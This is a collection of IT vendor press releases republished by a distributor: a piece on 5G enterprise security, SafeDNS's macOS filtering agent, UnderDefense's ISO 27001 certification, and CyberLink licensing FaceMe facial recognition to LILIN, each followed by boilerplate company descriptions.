The future of enterprise 5G is more about applications and innovations. Success becomes guaranteed when companies take advantage of speed, low latency, cost-effectiveness, AI collaborations, and more. 

5G security is not only about the right security equipment- It involves collaborations, building workflows, procedures, and more. It’s also about establishing an effective security management process. Other focus areas include spectrum sharing, Legacy Communications Infrastructure, policy, and standard threats. 

Security has always mattered in the online technology space though as breaches and threats become more complex, the higher the stakes become. As a result, enterprises need to modernize their approaches to  network security  to keep their users safe from increasingly innovative threat actors. 

  

 

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Agent for Mac

SafeDNS has released the new MacOS agent. For all Mac users, this means more efficient use of web filtering software and the option to filter separate devices, which differs agents from browser dashboard access.

The process shall be familiar, or simply intuitive for new users. First, you need to register on the website and adjust the settings in your personal account. The next step would be installing the Mac agent from the Support tab on the website or the Dashboard in the cabinet.

The agent enables filtering & allows you to switch between filtering profiles. It can be used within the same tariff on multiple devices. After installation, the agent starts automatically, asking the user for a pin code to change the settings in the agent.

There are several tabs in the agent.

The first tab, Policy, opens by default. In there you select a profile from the list by simply clicking on it.

By clicking on the second tab, System Information, you get a detailed list of system characteristics with network profiles and agent version, protection status, user filtering profiles and much more.

The Debug tab shows the state of interaction of agents with DNS proxy and the ability to send logs to our technical support, which will allow you to understand possible problems in the agent’s work.

On the top panel there is a button for switching the protection status allowing you to disable and enable filtering without logging out.

Below the title of the program there is a user panel that displays the account, IP address, tariff plan and, for most users who have a subscription with an expiration date, the end date of the tariff.

The agent will be available for download tomorrow.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

UnderDefense Achieves ISO 27001:2013, the Leading International Standard Certification

UnderDefense ISO 27001:2013 Certificate

UnderDefense is a Security-as-a-Service (Sec-a-s-S) & Compliance platform that has been giving a stellar performance in security services, meeting and exceeding our clients’ expectations. 

Now we have indisputable proof of our consistent excellence and professional expertise and official confirmation of our risk managing efficiency.

With a sense of immense pride and a thrill of excitement, we would like to report that in November 2021 UnderDefense received ISO 27001:2013 certification which is easily recognized all around the world and increases business opportunities for organizations and professionals. 

After extensive audits carried out by Bureau Veritas Certification Holding SAS-UK Branch, the UnderDefense IS Management System was found to be fully compliant and able to meet all best practices for serving customers` needs.

This achievement demonstrates UnderDefense’s continued commitment to protecting customers’ most valuable assets because our target is proven excellence for all.

CyberLink’s facial recognition engine FaceMe® to power LILIN’s connected devices, providing businesses with contactless access control management and visitor analytics

TAIPEI, TAIWAN – July 28 2020 – CyberLink Corp. (5203.TW), a pioneer in AI and facial recognition technologies, today announced it has formed a partnership with surveillance solution provider LILIN, leveraging new facial recognition technologies to create comprehensive smart security and retail solutions. CyberLink will license its FaceMe® facial recognition engine to LILIN, powering its NAV Facial Recognition Recorder, creating an all-in-one smart security, data analysis and warning solution.

With the combined technologies, LILIN’s connected video devices can provide businesses with a series of contactless solutions, such as granting verified personnel access to restricted areas within offices, factories or residential buildings through an opt-in photo identification system. The new offering can also provide retailers and hospitality operators with anonymized customer demographics to better understand their customer experience, such as identifying trending emotions patrons may feel when engaged in specific activities or visiting certain areas of a venue.

As the coronavirus pandemic continues to develop across the globe, CyberLink’s and LILIN’s joint facial recognition system uniquely provides businesses seeking contactless solutions the underlying technology to reduce the need for people to touch highly shared surfaces by replacing key cards or PIN passwords with biometric data.

“If there was ever a field worthy of continued research and innovation, it’s security,” said Dr. Jau Huang, CEO of CyberLink. “Without a doubt, LILIN is a global leader and manufacturer of IoT devices, and CyberLink is a worldwide pioneer developing facial recognition applications for connected devices. Together, we are setting a new standard for what makes a place secure by bringing to market new technologies that make our customers safer, and our businesses smarter.”

“LILIN has many years of smart security experience, providing insight into the market’s needs for creating a comprehensive intelligent security solution. LILIN is pleased to partner with CyberLink and integrates FaceMe® into our facial recognition system to strengthen smart retail, smart healthcare, smart factory, and smart business applications. Through continued efforts, I believe that LILIN will provide the most advanced total security solution for global customers.” said Mr. C.C. Hsu, LILIN’s President.

CyberLink and LILIN will host a webinar titled “Facial Recognition x Smart Security

Empowering Smart AIoT Applications”” on August 13, 2020 from 14:00-15:00 (GMT+8/Taipei time), further describing the many use cases enabled through the new product offering. For detailed event information and a registration link, please visit: https://is.gd/SfXQ7l

FaceMe’s® edge-based architecture empowers powerful, efficient processing, and higher levels of security compared to Cloud-based solutions. It supports more than 10 operating systems, including Windows, Android, iOS, and various Linux distributions such as Ubuntu x86, Ubuntu ARM, RedHat, CentOS, Yocto, Debian and JetPack. FaceMe’s® high accuracy, flexibility and security makes it the leading facial recognition engine available on the market today, and it is one of the world’s most accurate engines as deemed by the global standard NIST Facial Recognition Vendor Test.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About CyberLink
Founded in 1996, CyberLink Corp. (5203.TW) is the world leader in multimedia software and AI facial recognition technology. CyberLink addresses the demands of consumer, commercial and education markets through a wide range of solutions, covering digital content creation, multimedia playback, video conferencing, live casting, mobile applications and AI facial recognition.  CyberLink has shipped several hundred million copies of its multimedia software and apps, including the award-winning PowerDirector, PhotoDirector, and PowerDVD.  With years of research in the fields of artificial intelligence and facial recognition, CyberLink has developed the FaceMe® Facial Recognition Engine. Powered by deep learning algorithms, FaceMe® delivers the reliable, high-precision, and real-time facial recognition that is critical to AIoT applications such as smart retail, smart security, and surveillance, smart city and smart home. For more information about CyberLink, please visit the official website at www.cyberlink.com